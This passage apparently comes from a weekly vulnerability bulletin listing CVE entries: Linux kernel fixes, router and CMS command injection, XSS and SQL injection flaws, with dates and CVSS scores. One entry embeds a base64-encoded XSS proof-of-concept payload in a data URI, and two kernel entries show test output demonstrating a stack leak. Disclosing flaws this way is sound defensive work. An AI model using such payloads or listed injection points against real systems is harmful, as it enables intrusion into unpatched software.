In the Linux kernel, the following vulnerability has been resolved: s390/cpum_sf: Handle CPU hotplug remove during sampling CPU hotplug remove handling triggers the following function call sequence: CPUHP_AP_PERF_S390_SF_ONLINE --> s390_pmu_sf_offline_cpu() ... CPUHP_AP_PERF_ONLINE --> perf_event_exit_cpu() The s390 CPUMF sampling CPU hotplug handler invokes: s390_pmu_sf_offline_cpu() +--> cpusf_pmu_setup() +--> setup_pmc_cpu() +--> deallocate_buffers() This function de-allocates all sampling data buffers (SDBs) allocated for that CPU at event initialization. It also clears the PMU_F_RESERVED bit. The CPU is gone and can not be sampled. With the event still being active on the removed CPU, the CPU event hotplug support in kernel performance subsystem triggers the following function calls on the removed CPU: perf_event_exit_cpu() +--> perf_event_exit_cpu_context() +--> __perf_event_exit_context() +--> __perf_remove_from_context() +--> event_sched_out() +--> cpumsf_pmu_del() +--> cpumsf_pmu_stop() +--> hw_perf_event_update() to stop and remove the event. During removal of the event, the sampling device driver tries to read out the remaining samples from the sample data buffers (SDBs). But they have already been freed (and may have been re-assigned). This may lead to a use after free situation in which case the samples are most likely invalid. In the best case the memory has not been reassigned and still contains valid data. Remedy this situation and check if the CPU is still in reserved state (bit PMU_F_RESERVED set). In this case the SDBs have not been released an contain valid data. This is always the case when the event is removed (and no CPU hotplug off occured). If the PMU_F_RESERVED bit is not set, the SDB buffers are gone. | 2025-01-11 | not yet calculated | CVE-2024-57849 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: jffs2: Prevent rtime decompress memory corruption The rtime decompression routine does not fully check bounds during the entirety of the decompression pass and can corrupt memory outside the decompression buffer if the compressed data is corrupted. This adds the required check to prevent this failure mode. | 2025-01-11 | not yet calculated | CVE-2024-57850 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: pltfrm: Dellocate HBA during ufshcd_pltfrm_remove() This will ensure that the scsi host is cleaned up properly using scsi_host_dev_release(). Otherwise, it may lead to memory leaks. | 2025-01-11 | not yet calculated | CVE-2024-57872 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: arm64: ptrace: fix partial SETREGSET for NT_ARM_TAGGED_ADDR_CTRL Currently tagged_addr_ctrl_set() doesn't initialize the temporary 'ctrl' variable, and a SETREGSET call with a length of zero will leave this uninitialized. Consequently tagged_addr_ctrl_set() will consume an arbitrary value, potentially leaking up to 64 bits of memory from the kernel stack. The read is limited to a specific slot on the stack, and the issue does not provide a write mechanism. As set_tagged_addr_ctrl() only accepts values where bits [63:4] zero and rejects other values, a partial SETREGSET attempt will randomly succeed or fail depending on the value of the uninitialized value, and the exposure is significantly limited. Fix this by initializing the temporary value before copying the regset from userspace, as for other regsets (e.g. NT_PRSTATUS, NT_PRFPREG, NT_ARM_SYSTEM_CALL). In the case of a zero-length write, the existing value of the tagged address ctrl will be retained. The NT_ARM_TAGGED_ADDR_CTRL regset is only visible in the user_aarch64_view used by a native AArch64 task to manipulate another native AArch64 task. As get_tagged_addr_ctrl() only returns an error value when called for a compat task, tagged_addr_ctrl_get() and tagged_addr_ctrl_set() should never observe an error value from get_tagged_addr_ctrl(). Add a WARN_ON_ONCE() to both to indicate that such an error would be unexpected, and error handlnig is not missing in either case. | 2025-01-11 | not yet calculated | CVE-2024-57874 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: block: RCU protect disk->conv_zones_bitmap Ensure that a disk revalidation changing the conventional zones bitmap of a disk does not cause invalid memory references when using the disk_zone_is_conv() helper by RCU protecting the disk->conv_zones_bitmap pointer. disk_zone_is_conv() is modified to operate under the RCU read lock and the function disk_set_conv_zones_bitmap() is added to update a disk conv_zones_bitmap pointer using rcu_replace_pointer() with the disk zone_wplugs_lock spinlock held. disk_free_zone_resources() is modified to call disk_update_zone_resources() with a NULL bitmap pointer to free the disk conv_zones_bitmap. disk_set_conv_zones_bitmap() is also used in disk_update_zone_resources() to set the new (revalidated) bitmap and free the old one. | 2025-01-11 | not yet calculated | CVE-2024-57875 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/dp_mst: Fix resetting msg rx state after topology removal If the MST topology is removed during the reception of an MST down reply or MST up request sideband message, the drm_dp_mst_topology_mgr::up_req_recv/down_rep_recv states could be reset from one thread via drm_dp_mst_topology_mgr_set_mst(false), racing with the reading/parsing of the message from another thread via drm_dp_mst_handle_down_rep() or drm_dp_mst_handle_up_req(). The race is possible since the reader/parser doesn't hold any lock while accessing the reception state. This in turn can lead to a memory corruption in the reader/parser as described by commit bd2fccac61b4 ("drm/dp_mst: Fix MST sideband message body length check"). Fix the above by resetting the message reception state if needed before reading/parsing a message. Another solution would be to hold the drm_dp_mst_topology_mgr::lock for the whole duration of the message reception/parsing in drm_dp_mst_handle_down_rep() and drm_dp_mst_handle_up_req(), however this would require a bigger change. Since the fix is also needed for stable, opting for the simpler solution in this patch. | 2025-01-11 | not yet calculated | CVE-2024-57876 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: arm64: ptrace: fix partial SETREGSET for NT_ARM_POE Currently poe_set() doesn't initialize the temporary 'ctrl' variable, and a SETREGSET call with a length of zero will leave this uninitialized. Consequently an arbitrary value will be written back to target->thread.por_el0, potentially leaking up to 64 bits of memory from the kernel stack. The read is limited to a specific slot on the stack, and the issue does not provide a write mechanism. Fix this by initializing the temporary value before copying the regset from userspace, as for other regsets (e.g. NT_PRSTATUS, NT_PRFPREG, NT_ARM_SYSTEM_CALL). In the case of a zero-length write, the existing contents of POR_EL1 will be retained. Before this patch: | # ./poe-test | Attempting to write NT_ARM_POE::por_el0 = 0x900d900d900d900d | SETREGSET(nt=0x40f, len=8) wrote 8 bytes | | Attempting to read NT_ARM_POE::por_el0 | GETREGSET(nt=0x40f, len=8) read 8 bytes | Read NT_ARM_POE::por_el0 = 0x900d900d900d900d | | Attempting to write NT_ARM_POE (zero length) | SETREGSET(nt=0x40f, len=0) wrote 0 bytes | | Attempting to read NT_ARM_POE::por_el0 | GETREGSET(nt=0x40f, len=8) read 8 bytes | Read NT_ARM_POE::por_el0 = 0xffff8000839c3d50 After this patch: | # ./poe-test | Attempting to write NT_ARM_POE::por_el0 = 0x900d900d900d900d | SETREGSET(nt=0x40f, len=8) wrote 8 bytes | | Attempting to read NT_ARM_POE::por_el0 | GETREGSET(nt=0x40f, len=8) read 8 bytes | Read NT_ARM_POE::por_el0 = 0x900d900d900d900d | | Attempting to write NT_ARM_POE (zero length) | SETREGSET(nt=0x40f, len=0) wrote 0 bytes | | Attempting to read NT_ARM_POE::por_el0 | GETREGSET(nt=0x40f, len=8) read 8 bytes | Read NT_ARM_POE::por_el0 = 0x900d900d900d900d | 2025-01-11 | not yet calculated | CVE-2024-57877 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: arm64: ptrace: fix partial SETREGSET for NT_ARM_FPMR Currently fpmr_set() doesn't initialize the temporary 'fpmr' variable, and a SETREGSET call with a length of zero will leave this uninitialized. Consequently an arbitrary value will be written back to target->thread.uw.fpmr, potentially leaking up to 64 bits of memory from the kernel stack. The read is limited to a specific slot on the stack, and the issue does not provide a write mechanism. Fix this by initializing the temporary value before copying the regset from userspace, as for other regsets (e.g. NT_PRSTATUS, NT_PRFPREG, NT_ARM_SYSTEM_CALL). In the case of a zero-length write, the existing contents of FPMR will be retained. Before this patch: | # ./fpmr-test | Attempting to write NT_ARM_FPMR::fpmr = 0x900d900d900d900d | SETREGSET(nt=0x40e, len=8) wrote 8 bytes | | Attempting to read NT_ARM_FPMR::fpmr | GETREGSET(nt=0x40e, len=8) read 8 bytes | Read NT_ARM_FPMR::fpmr = 0x900d900d900d900d | | Attempting to write NT_ARM_FPMR (zero length) | SETREGSET(nt=0x40e, len=0) wrote 0 bytes | | Attempting to read NT_ARM_FPMR::fpmr | GETREGSET(nt=0x40e, len=8) read 8 bytes | Read NT_ARM_FPMR::fpmr = 0xffff800083963d50 After this patch: | # ./fpmr-test | Attempting to write NT_ARM_FPMR::fpmr = 0x900d900d900d900d | SETREGSET(nt=0x40e, len=8) wrote 8 bytes | | Attempting to read NT_ARM_FPMR::fpmr | GETREGSET(nt=0x40e, len=8) read 8 bytes | Read NT_ARM_FPMR::fpmr = 0x900d900d900d900d | | Attempting to write NT_ARM_FPMR (zero length) | SETREGSET(nt=0x40e, len=0) wrote 0 bytes | | Attempting to read NT_ARM_FPMR::fpmr | GETREGSET(nt=0x40e, len=8) read 8 bytes | Read NT_ARM_FPMR::fpmr = 0x900d900d900d900d | 2025-01-11 | not yet calculated | CVE-2024-57878 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: iso: Always release hdev at the end of iso_listen_bis Since hci_get_route holds the device before returning, the hdev should be released with hci_dev_put at the end of iso_listen_bis even if the function returns with an error. | 2025-01-11 | not yet calculated | CVE-2024-57879 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ASoC: Intel: sof_sdw: Add space for a terminator into DAIs array The code uses the initialised member of the asoc_sdw_dailink struct to determine if a member of the array is in use. However in the case the array is completely full this will lead to an access 1 past the end of the array, expand the array by one entry to include a space for a terminator. | 2025-01-11 | not yet calculated | CVE-2024-57880 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm/page_alloc: don't call pfn_to_page() on possibly non-existent PFN in split_large_buddy() In split_large_buddy(), we might call pfn_to_page() on a PFN that might not exist. In corner cases, such as when freeing the highest pageblock in the last memory section, this could result with CONFIG_SPARSEMEM && !CONFIG_SPARSEMEM_EXTREME in __pfn_to_section() returning NULL and and __section_mem_map_addr() dereferencing that NULL pointer. Let's fix it, and avoid doing a pfn_to_page() call for the first iteration, where we already have the page. So far this was found by code inspection, but let's just CC stable as the fix is easy. | 2025-01-11 | not yet calculated | CVE-2024-57881 |
| MicahParks--jwkset |
JWK Set (JSON Web Key Set) is a JWK and JWK Set Go implementation. Prior to 0.6.0, the project's provided HTTP client's local JWK Set cache should do a full replacement when the goroutine refreshes the remote JWK Set. The current behavior is to overwrite or append. This is a security issue for use cases that utilize the provided auto-caching HTTP client and where key removal from a JWK Set is equivalent to revocation. The affected auto-caching HTTP client was added in version v0.5.0 and fixed in v0.6.0. The only workaround would be to remove the provided auto-caching HTTP client and replace it with a custom implementation. This involves setting the HTTPClientStorageOptions.RefreshInterval to zero (or not specifying the value). | 2025-01-09 | not yet calculated | CVE-2025-22149 |
| moyangzhan--langchain4j-aideepin |
LangChain4j-AIDeepin is a Retrieval enhancement generation (RAG) project. Prior to 3.5.0, LangChain4j-AIDeepin uses MD5 to hash files, which may cause file upload conflicts. This issue is fixed in 3.5.0. | 2025-01-06 | not yet calculated | CVE-2025-21604 |
| Mozilla--Firefox |
When segmenting specially crafted text, segmentation would corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 134, Firefox ESR < 128.6, Thunderbird < 134, and Thunderbird ESR < 128.6. | 2025-01-07 | not yet calculated | CVE-2025-0241 |
| Mozilla--Firefox |
Memory safety bugs present in Firefox 133 and Thunderbird 133. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 134 and Thunderbird < 134. | 2025-01-07 | not yet calculated | CVE-2025-0247 |
| Mozilla--Firefox for iOS |
Opening Javascript links in a new tab via long-press in the Firefox iOS client could result in a malicious script spoofing the URL of the new tab. This vulnerability affects Firefox for iOS < 134. | 2025-01-11 | not yet calculated | CVE-2025-23108 |
| Mozilla--Firefox for iOS |
Long hostnames in URLs could be leveraged to obscure the actual host of the website or spoof the website address This vulnerability affects Firefox for iOS < 134. | 2025-01-11 | not yet calculated | CVE-2025-23109 |
| n/a--n/a |
Gramine before a390e33e16ed374a40de2344562a937f289be2e1 suffers from an Interface vulnerability due to mismatching SW signals vs HW exceptions. | 2025-01-10 | not yet calculated | CVE-2024-25371 |
| n/a--n/a |
Fortanix Enclave OS 3.36.1941-EM has an interface vulnerability that leads to state corruption via injected signals. | 2025-01-10 | not yet calculated | CVE-2024-29970 |
| n/a--n/a |
Scontain SCONE 5.8.0 has an interface vulnerability that leads to state corruption via injected signals. | 2025-01-10 | not yet calculated | CVE-2024-29971 |
| n/a--n/a |
Cross Site Scripting vulnerability in Microweber v.2.0.9 allows a remote attacker to execute arbitrary code via the campaign Name (Internal Name) field in the Add new campaign function | 2025-01-10 | not yet calculated | CVE-2024-33297 |
| n/a--n/a |
Microweber Cross Site Scripting vulnerability in Microweber v.2.0.9 allows a remote attacker to execute arbitrary code via the create new backup function in the endpoint /admin/module/view?type=admin__backup | 2025-01-10 | not yet calculated | CVE-2024-33298 |
| n/a--n/a |
Cross Site Scripting vulnerability in Microweber v.2.0.9 allows a remote attacker to execute arbitrary code via the First Name and Last Name parameters in the endpoint /admin/module/view?type=users | 2025-01-10 | not yet calculated | CVE-2024-33299 |
| n/a--n/a |
An arbitrary file upload vulnerability in the MediaPool module of Redaxo CMS v5.17.1 allows attackers to execute arbitrary code via uploading a crafted file. | 2025-01-10 | not yet calculated | CVE-2024-46210 |
| n/a--n/a |
Infoblox BloxOne v2.4 was discovered to contain a business logic flaw due to thick client vulnerabilities. | 2025-01-09 | not yet calculated | CVE-2024-46505 |
| n/a--n/a |
Buffer Overflow vulnerability in Neat Board NFC v.1.20240620.0015 allows a physically proximate attackers to escalate privileges via a crafted payload to the password field | 2025-01-09 | not yet calculated | CVE-2024-48806 |
| n/a--n/a |
Trippo Responsive Filemanager 9.14.0 is vulnerable to Cross Site Scripting (XSS) via file upload using the svg and pdf extensions. | 2025-01-10 | not yet calculated | CVE-2024-50807 |
| n/a--n/a |
Certain Teradata account-handling code through 2024-11-04, used with SUSE Enterprise Linux Server, mismanages groups. Specifically, when there is an operating system move from SUSE Enterprise Linux Server (SLES) 12 Service Pack (SP) 2 or 3 to SLES 15 SP2 on Teradata Database systems, some service/system user accounts, and possibly systems administrator created user accounts, are incorrectly assigned to groups that allow higher system-level privileges than intended for those user accounts. Depending on the usage of these accounts, this may lead to full system compromise. | 2025-01-08 | not yet calculated | CVE-2024-52869 |
| n/a--n/a |
composio >=0.5.40 is vulnerable to Command Execution in composio_openai, composio_claude, and composio_julep via the handle_tool_calls function. | 2025-01-08 | not yet calculated | CVE-2024-53526 |
| n/a--n/a |
The com.glitter.caller.screen (aka iCaller, Caller Theme & Dialer) application through 1.1 for Android enables any application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.glitter.caller.screen.DialerActivity component. | 2025-01-06 | not yet calculated | CVE-2024-53931 |
| n/a--n/a |
The com.remi.colorphone.callscreen.calltheme.callerscreen (aka Color Phone: Call Screen Theme) application through 21.1.9 for Android enables any application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.remi.colorphone.callscreen.calltheme.callerscreen.dialer.DialerActivity component. | 2025-01-06 | not yet calculated | CVE-2024-53932 |
| n/a--n/a |
Vtiger CRM v.6.1 and before is vulnerable to Cross Site Scripting (XSS) via the Documents module and function uploadAndSaveFile in CRMEntity.php. | 2025-01-10 | not yet calculated | CVE-2024-54687 |
| n/a--n/a |
PHPYun before 7.0.2 is vulnerable to code execution through backdoor-restricted arbitrary file writing and file inclusion. | 2025-01-09 | not yet calculated | CVE-2024-54724 |
| n/a--n/a |
An issue in CP Plus CP-VNR-3104 B3223P22C02424 allows attackers to obtain the EC private key and access sensitive data or execute a man-in-the-middle attack. | 2025-01-10 | not yet calculated | CVE-2024-54846 |
| n/a--n/a |
An issue in CP Plus CP-VNR-3104 B3223P22C02424 allows attackers to access the Diffie-Hellman (DH) parameters and access sensitive data or execute a man-in-the-middle attack. | 2025-01-10 | not yet calculated | CVE-2024-54847 |
| n/a--n/a |
Improper handling and storage of certificates in CP Plus CP-VNR-3104 B3223P22C02424 allow attackers to decrypt communications or execute a man-in-the-middle attacks. | 2025-01-10 | not yet calculated | CVE-2024-54848 |
| n/a--n/a |
An issue in CP Plus CP-VNR-3104 B3223P22C02424 allows attackers to obtain the second RSA private key and access sensitive data or execute a man-in-the-middle attack. | 2025-01-10 | not yet calculated | CVE-2024-54849 |
| n/a--n/a |
TP-Link TL-WR940N V3 and V4 with firmware 3.16.9 and earlier contain a buffer overflow via the dnsserver1 and dnsserver2 parameters at /userRpm/Wan6to4TunnelCfgRpm.htm. This vulnerability allows an authenticated attacker to execute arbitrary code on the remote device in the context of the root user. | 2025-01-09 | not yet calculated | CVE-2024-54887 |
| n/a--n/a |
Hasleo Backup Suite Free v4.9.4 and before is vulnerable to Insecure Permissions via the File recovery function. | 2025-01-10 | not yet calculated | CVE-2024-54910 |
| n/a--n/a |
MonicaHQ v4.1.2 was discovered to contain multiple Client-Side Injection vulnerabilities via the first_name and last_name parameters in the Add a new relationship feature. | 2025-01-10 | not yet calculated | CVE-2024-54994 |
| n/a--n/a |
MonicaHQ v4.1.2 was discovered to contain multiple authenticated Client-Side Injection vulnerabilities via the title and description parameters at /people/ID/reminders/create. | 2025-01-10 | not yet calculated | CVE-2024-54996 |
| n/a--n/a |
MonicaHQ v4.1.1 was discovered to contain an authenticated Client-Side Injection vulnerability via the entry text field at /journal/entries/ID/edit. | 2025-01-10 | not yet calculated | CVE-2024-54997 |
| n/a--n/a |
MonicaHQ v4.1.2 was discovered to contain an authenticated Client-Side Injection vulnerability via the Reason parameter at /people/h:[id]/debts/create. | 2025-01-10 | not yet calculated | CVE-2024-54998 |
| n/a--n/a |
Smart Toilet Lab - Motius 1.3.11 is running with debug mode turned on (DEBUG = True) and exposing sensitive information defined in Django settings file through verbose error page. | 2025-01-09 | not yet calculated | CVE-2024-56113 |
| n/a--n/a |
Canlineapp Online 1.1 is vulnerable to Broken Access Control and allows users with the Auditor role to create an audit template as a result of improper authorization checks. This feature is designated for supervisor role, but auditors have been able to successfully create audit templates from their account. | 2025-01-09 | not yet calculated | CVE-2024-56114 |
| n/a--n/a |
File Upload vulnerability in ChestnutCMS through 1.5.0. Based on the code analysis, it was determined that the /api/member/avatar API endpoint receives a base64 string as input. This string is then passed to the memberService.uploadAvatarByBase64 method for processing. Within the service, the base64-encoded image is parsed. For example, given a string like: data:image/html;base64,PGh0bWw+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPjwvaHRtbD4= the content after the comma is extracted and decoded using Base64.getDecoder().decode(). The substring from the 11th character up to the first occurrence of a semicolon (;) is assigned to the suffix variable (representing the file extension). The decoded content is then written to a file. However, the file extension is not validated, and since this functionality is exposed to the frontend, it poses significant security risks. | 2025-01-06 | not yet calculated | CVE-2024-56828 |
| n/a--n/a |
TOTOLINK A6000R V1.0.1-B20201211.2000 was discovered to contain a command injection vulnerability via the modifyOne parameter in the enable_wsh function. | 2025-01-10 | not yet calculated | CVE-2024-57211 |
| n/a--n/a |
TOTOLINK A6000R V1.0.1-B20201211.2000 was discovered to contain a command injection vulnerability via the opmode parameter in the action_reboot function. | 2025-01-10 | not yet calculated | CVE-2024-57212 |
| n/a--n/a |
TOTOLINK A6000R V1.0.1-B20201211.2000 was discovered to contain a command injection vulnerability via the newpasswd parameter in the action_passwd function. | 2025-01-10 | not yet calculated | CVE-2024-57213 |
| n/a--n/a |
TOTOLINK A6000R V1.0.1-B20201211.2000 was discovered to contain a command injection vulnerability via the devname parameter in the reset_wifi function. | 2025-01-10 | not yet calculated | CVE-2024-57214 |
| n/a--n/a |
Linksys E7350 1.1.00.032 was discovered to contain a command injection vulnerability via the ifname parameter in the apcli_cancel_wps function. | 2025-01-10 | not yet calculated | CVE-2024-57222 |
| n/a--n/a |
Linksys E7350 1.1.00.032 was discovered to contain a command injection vulnerability via the ifname parameter in the apcli_wps_gen_pincode function. | 2025-01-10 | not yet calculated | CVE-2024-57223 |
| n/a--n/a |
Linksys E7350 1.1.00.032 was discovered to contain a command injection vulnerability via the ifname parameter in the apcli_do_enr_pin_wps function. | 2025-01-10 | not yet calculated | CVE-2024-57224 |
| n/a--n/a |
Linksys E7350 1.1.00.032 was discovered to contain a command injection vulnerability via the devname parameter in the reset_wifi function. | 2025-01-10 | not yet calculated | CVE-2024-57225 |
| n/a--n/a |
Linksys E7350 1.1.00.032 was discovered to contain a command injection vulnerability via the iface parameter in the vif_enable function. | 2025-01-10 | not yet calculated | CVE-2024-57226 |
| n/a--n/a |
Linksys E7350 1.1.00.032 was discovered to contain a command injection vulnerability via the ifname parameter in the apcli_do_enr_pbc_wps function. | 2025-01-10 | not yet calculated | CVE-2024-57227 |
| n/a--n/a |
Linksys E7350 1.1.00.032 was discovered to contain a command injection vulnerability via the iface parameter in the vif_disable function. | 2025-01-10 | not yet calculated | CVE-2024-57228 |
| n/a--n/a |
Tenda ac9 v1.0 firmware v15.03.05.19 contains a stack overflow vulnerability in /goform/SetOnlineDevName, which may lead to remote arbitrary code execution. | 2025-01-10 | not yet calculated | CVE-2025-22946 |
| n/a--n/a |
Tenda ac9 v1.0 firmware v15.03.05.19 is vulnerable to command injection in /goform/SetSambaCfg, which may lead to remote arbitrary code execution. | 2025-01-10 | not yet calculated | CVE-2025-22949 |
| nilsonLazarin--WeGIA |
WeGIA is a web manager for charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the configuracao_geral.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the msg_c parameter. This vulnerability is fixed in 3.2.8. | 2025-01-08 | not yet calculated | CVE-2025-22139 |
| nilsonLazarin--WeGIA |
WeGIA is a web manager for charitable institutions. A SQL Injection vulnerability was identified in the /html/funcionario/dependente_listar_um.php endpoint, specifically in the id_dependente parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database. This vulnerability is fixed in 3.2.8. | 2025-01-08 | not yet calculated | CVE-2025-22140 |
| nilsonLazarin--WeGIA |
WeGIA is a web manager for charitable institutions. A SQL Injection vulnerability was identified in the /dao/verificar_recursos_cargo.php endpoint, specifically in the cargo parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database. This vulnerability is fixed in 3.2.8. | 2025-01-08 | not yet calculated | CVE-2025-22141 |
| Node.js--Node.js |
Due to the improper handling of batch files in child_process.spawn / child_process.spawnSync, a malicious command line argument can inject arbitrary commands and achieve code execution even if the shell option is not enabled. | 2025-01-09 | not yet calculated | CVE-2024-27980 |
| nodejs--node |
The Permission Model assumes that any path starting with two backslashes \ has a four-character prefix that can be ignored, which is not always true. This subtle bug leads to vulnerable edge cases. | 2025-01-09 | not yet calculated | CVE-2024-37372 |
| Palo Alto Networks--Cloud NGFW |
An SQL injection vulnerability in Palo Alto Networks Expedition enables an authenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. This vulnerability also enables attackers to create and read arbitrary files on the Expedition system. | 2025-01-11 | not yet calculated | CVE-2025-0103 |
| Palo Alto Networks--Cloud NGFW |
A reflected cross-site scripting (XSS) vulnerability in Palo Alto Networks Expedition enables attackers to execute malicious JavaScript code in the context of an authenticated Expedition user's browser if that authenticated user clicks a malicious link that allows phishing attacks and could lead to Expedition browser-session theft. | 2025-01-11 | not yet calculated | CVE-2025-0104 |
| Palo Alto Networks--Cloud NGFW |
An arbitrary file deletion vulnerability in Palo Alto Networks Expedition enables an unauthenticated attacker to delete arbitrary files accessible to the www-data user on the host filesystem. | 2025-01-11 | not yet calculated | CVE-2025-0105 |
| Palo Alto Networks--Cloud NGFW |
A wildcard expansion vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to enumerate files on the host filesystem. | 2025-01-11 | not yet calculated | CVE-2025-0106 |
| Palo Alto Networks--Cloud NGFW |
An OS command injection vulnerability in Palo Alto Networks Expedition enables an authenticated attacker to run arbitrary OS commands as the www-data user in Expedition, which results in the disclosure of usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software. | 2025-01-11 | not yet calculated | CVE-2025-0107 |
| Rails--ActiveSupport |
ActiveSupport::EncryptedFile writes contents that will be encrypted to a temporary file. The temporary file's permissions are defaulted to the user's current `umask` settings, meaning that it's possible for other users on the same system to read the contents of the temporary file. Attackers that have access to the file system could possibly read the contents of this temporary file while a user is editing it. All users running an affected release should either upgrade or use one of the workarounds immediately. | 2025-01-09 | not yet calculated | CVE-2023-38037 |
| SickChill--sickchill |
SickChill is an automatic video library manager for TV shows. A user-controlled `login` endpoint's `next_` parameter takes arbitrary content. Prior to commit c7128a8946c3701df95c285810eb75b2de18bf82, an authenticated attacker may use this to redirect the user to arbitrary destinations, leading to open redirect. Commit c7128a8946c3701df95c285810eb75b2de18bf82 changes the login page to redirect to `settings.DEFAULT_PAGE` instead of to the `next` parameter. | 2025-01-08 | not yet calculated | CVE-2024-53995 |
| The Document Foundation--LibreOffice |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in The Document Foundation LibreOffice allows Absolute Path Traversal. An attacker can write to arbitrary locations, albeit suffixed with ".ttf", by supplying a file in a format that supports embedded font files. This issue affects LibreOffice: from 24.8 before < 24.8.4. | 2025-01-07 | not yet calculated | CVE-2024-12425 |
| The Document Foundation--LibreOffice |
Exposure of Environmental Variables and arbitrary INI file values to an Unauthorized Actor vulnerability in The Document Foundation LibreOffice. URLs could be constructed which expanded environmental variables or INI file values, so potentially sensitive information could be exfiltrated to a remote server on opening a document containing such links. This issue affects LibreOffice: from 24.8 before < 24.8.4. | 2025-01-07 | not yet calculated | CVE-2024-12426 |
| Unknown--Contact Form Master |
The Contact Form Master WordPress plugin through 1.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-01-11 | not yet calculated | CVE-2024-12587 |
| Wikimedia Foundation--Mediawiki - ArticleFeedbackv5 extension |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - ArticleFeedbackv5 extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - ArticleFeedbackv5 extension: from 1.42.X before 1.42.2. | 2025-01-10 | not yet calculated | CVE-2025-23079 |
| Wikimedia Foundation--Mediawiki - Breadcrumbs2 extension |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - Breadcrumbs2 extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Breadcrumbs2 extension: from 1.39.X before 1.39.11, from 1.41.X before 1.41.5, from 1.42.X before 1.42.4. | 2025-01-10 | not yet calculated | CVE-2025-23078 |
Vulnerability Summary for the Week of December 30, 2024
Posted on Monday January 06, 2025
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 10CentMail--10CentMail |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 10CentMail allows Reflected XSS.This issue affects 10CentMail: from n/a through 2.1.50. | 2025-01-02 | 7.1 | CVE-2024-56030 |
| 2100 Technology Electronic--Official Document Management System |
The Electronic Official Document Management System from 2100 Technology has an Authentication Bypass vulnerability. Although the product enforces an IP whitelist for the API used to query user tokens, unauthenticated remote attackers can still deceive the server to obtain tokens of arbitrary users, which can then be used to log into the system. | 2024-12-31 | 9.8 | CVE-2024-13061 |
| AdWorkMedia.com--AdWork Media EZ Content Locker |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AdWorkMedia.com AdWork Media EZ Content Locker allows Reflected XSS.This issue affects AdWork Media EZ Content Locker: from n/a through 3.0. | 2025-01-02 | 7.1 | CVE-2024-56025 |
| AF themes--WP Post Author |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AF themes WP Post Author allows SQL Injection.This issue affects WP Post Author: from n/a through 3.8.2. | 2025-01-02 | 7.6 | CVE-2024-56247 |
| AI Magic--AI Magic |
Incorrect Privilege Assignment vulnerability in AI Magic allows Privilege Escalation.This issue affects AI Magic: from n/a through 1.0.4. | 2024-12-31 | 9.8 | CVE-2024-56205 |
| alexacrm--Dynamics 365 Integration |
The Dynamics 365 Integration plugin for WordPress is vulnerable to Remote Code Execution and Arbitrary File Read in all versions up to, and including, 1.3.23 via Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. | 2025-01-04 | 9.9 | CVE-2024-12583 |
| Alexander Volkov--WP Nice Loader |
Cross-Site Request Forgery (CSRF) vulnerability in Alexander Volkov WP Nice Loader allows Stored XSS.This issue affects WP Nice Loader: from n/a through 0.1.0.4. | 2024-12-31 | 7.1 | CVE-2024-56232 |
| Amarjeet Amar--gap-hub-user-role |
Cross-Site Request Forgery (CSRF) vulnerability in Amarjeet Amar allows Authentication Bypass.This issue affects gap-hub-user-role: from n/a through 3.4.1. | 2024-12-31 | 8.8 | CVE-2024-56206 |
| ashlar -- cobalt |
Ashlar-Vellum Cobalt AR File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of AR files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24870. | 2024-12-30 | 7.8 | CVE-2024-13044 |
| ashlar -- cobalt |
Ashlar-Vellum Cobalt AR File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of AR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24848. | 2024-12-30 | 7.8 | CVE-2024-13045 |
